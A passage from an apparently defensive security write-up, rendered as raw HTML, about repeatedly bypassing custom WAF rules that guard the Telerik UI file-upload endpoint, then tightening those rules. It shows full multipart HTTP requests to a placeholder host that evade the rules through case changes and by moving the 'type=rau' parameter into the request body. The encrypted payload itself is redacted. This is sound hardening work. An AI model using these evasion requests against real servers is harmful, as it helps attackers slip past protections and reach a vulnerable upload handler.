}</span></pre><p cid="n71" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">It was observed that the custom rules developed for the specific WAF did<b> not perform normalization by default</b> on the path and query string parameters and therefore are unable to detect URL encoded characters. </span></p><p cid="n71" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">To address this bypass, the client was assisted in finding the WAF functionality that allowed to normalize the query string parameter of the request and detect any URL encoded parameters in the "<i>type=rau</i>" parameter.</span></p><p cid="n72" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><i>"So, all is good now, right?"</i></span></p><p cid="n72" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><i>Not quite...</i></span></p><p style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; text-align: left; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><b>- </b><b><u>3rd WAF Rule: the "case" is still open</u></b></span></p><p cid="n74" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">A regression test was then performed in order to be sure that the vulnerability was patched. However, although </span>the URL encoding did not lead to a bypass anymore, it was found that the endpoint was <b>case insentive!</b></p><p cid="n75" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">In fact, by specifying the value "<i>raU</i>" within the "<i>type</i>" parameter it was still valid as shown in the following request:</span></p><pre cid="n78" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="background-color: #f8f8f8; box-sizing: border-box; color: #770088;">POST</span> <span class="cm-string-2" style="box-sizing: border-box; color: #ff5500;"><span style="background-color: #f8f8f8;">/Telerik.Web.UI.WebResource.axd?</span><span style="background-color: #fcff01;">type=raU</span></span> <span class="cm-keyword" style="background-color: #f8f8f8; box-sizing: border-box; color: #770088;">HTTP/1.1</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Host:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> victim.com</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">User-Agent:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> Mozilla/5.0 (X11; Ubuntu; Linux x86_st64; rv:75.0) Gecko/20100101 Firefox/75.0</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> */*</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept-Language:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> en-US,en;q=0.5</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept-Encoding:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> gzip, deflate</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> multipart/form-data; boundary=---------------------------62616f37756f2f</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 2345</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="rauPostData"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">ATTu5i4R+ViNFY[Encrypted rauPostData Payload in base64]mUFAlzLUg==</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="file"; filename="blob"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Type: application/octet-stream</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Test_Test</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="fileName"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">RAU_crypto.bypass</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="contentType"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">text/html</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="lastModifiedDate"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">2019-01-02T03:04:05.067Z</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="metadata"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">{"TotalChunks":1,"ChunkIndex":0,"TotalFileSize":1,"UploadID":"test_12421498329494.txt"}</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f--</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></pre><p cid="n79" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Response:</span></p><pre cid="n80" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-color: #f8f8f8; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #770088;">HTTP/1.1</span> <span class="cm-positive cm-success" style="box-sizing: border-box; color: #229922;">200</span> OK</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Cache-Control:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> private</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> text/html; charset=utf-8</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Date:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> Fri, 08 May 2020 10:25:09 GMT</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 667</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">{"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":153,"DateJson":"2019-01-02T03:04:05.067Z","Index":0}, "metaData":"[Base64 Metadata]" }</span></pre><p cid="n81" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">To address this new bypass it was necessary to tune the rule<i><u> so that it transformed to lower case all the characters within the query string parameters before applying the check on the presence of the "type=rau" parameter</u></i>.</span></p><p cid="n82" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">So now we're confident that any variation of the "<i>Telerik.Web.UI.WebResource.axd?type=rau</i>" within the path of the <i>HTTP</i> request would be blocked by the the WAF rule. </span></p><p cid="n82" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><i>"Is it enough now?"</i></span></p><p style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; text-align: left; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><b>- </b><b><u>4th WAF Rule: the Multipart Magic</u></b></span></p><p cid="n84" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The Telerik UI file upload functionality can only be performed using an HTTP POST request of the "<i>multipart/form-data</i>" content type.</span></p><p cid="n116" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The WAF rule did not allow any variations of the "<i>type=rau</i>" parameter within the URL query string of the request.</span></p><p cid="n116" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><i>But what if the parameter is inserted within the body of the "multipart/form-data" file upload request? </i></span></p><p cid="n125" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Request:</span></p><pre cid="n124" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #770088;">POST</span> <span class="cm-string-2" style="box-sizing: border-box; color: #ff5500;">/Telerik.Web.UI.WebResource.axd</span> <span class="cm-keyword" style="box-sizing: border-box; color: #770088;">HTTP/1.1</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Host:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> victim.com</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">User-Agent:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> Mozilla/5.0 (X11; Ubuntu; Linux x86_st64; rv:75.0) Gecko/20100101 Firefox/75.0</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> */*</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept-Language:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> en-US,en;q=0.5</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Accept-Encoding:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> gzip, deflate</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> multipart/form-data; boundary=---------------------------62616f37756f2f</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 2444</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="rauPostData"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">ATTu5i4R+ViN[Encrypted rauPostData Payload in base64]AmUFAlzLUg==</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="file"; filename="blob"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Type: application/octet-stream</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Test_Test</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-da[Encrypted rauPostData Payload in base64]ta; name="fileName"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">RAU_crypto.bypass</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span style="background-color: #fcff01;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="type"</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">rau</span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="contentType"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">text/html</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="lastModifiedDate"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">2019-01-02T03:04:05.067Z</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">Content-Disposition: form-data; name="metadata"</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">{"TotalChunks":1,"ChunkIndex":0,"TotalFileSize":1,"UploadID":"test_12421498329494.txt"}</span><br /><span role="presentation" style="background-color: #f8f8f8; box-sizing: border-box; padding-right: 0.1px;">-----------------------------62616f37756f2f--</span></pre><p cid="n85" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><p cid="n127" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Response:</span></p><pre cid="n140" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="http" mdtype="fences" spellcheck="false" style="background-attachment: inherit; background-clip: inherit; background-color: #f8f8f8; background-image: inherit; background-origin: inherit; background-position: inherit; background-repeat: inherit; background-size: inherit; border-radius: 3px; border: 1px solid rgb(231, 234, 237); box-sizing: border-box; break-inside: avoid; color: #333333; font-family: var(--monospace); font-size: 0.9em; margin-bottom: 15px; margin-top: 15px; overflow: visible; padding: 8px 4px 6px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-keyword" style="box-sizing: border-box; color: #770088;">HTTP/1.1</span> <span class="cm-positive cm-success" style="box-sizing: border-box; color: #229922;">200</span> OK</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Cache-Control:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> private</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Type:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> text/html; charset=utf-8</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Date:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> Thu, 07 May 2020 14:29:31 GMT</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Content-Length:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> 666</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-atom" style="box-sizing: border-box; color: #221199;">Connection:</span><span class="cm-string" style="box-sizing: border-box; color: #aa1111;"> close</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">{"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":18,"DateJson":"2019-01-02T03:04:05.067Z","Index":0},"metaData":"[Base64 Metadata]" }</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></pre><p cid="n108" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><p cid="n148" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><i><u>It works!</u></i></span></p><p cid="n148" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Telerik UI accepts the "<i>type</i>" parameter also as a body parameter of the "<i>multipart/form-data</i>" file upload voiding the efficacy of the <i>WAF</i> rule that performs its checks on the URL query string parameters of the request.</span></p><p cid="n150" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">The discovery of this behavior required the security engineers of the client to change the approach of the rule development: in order to block this vulnerability it was not enough to check the contents of the query string but it was necessary to perform checks on the body of the POST request as well.</span></p><p cid="n146" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"></p><p style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.25em; line-height: 1.4; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; text-align: left; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><b><u>- 5th WAF Rule: RegEx Woes</u></b></span></p><p cid="n112" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">In order to be sure to block also the requests that do not contain any parameter within the query string, regular expressions were used to check the content of the request body.</span></p><p cid="n158" class="md-end-block md-p" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: 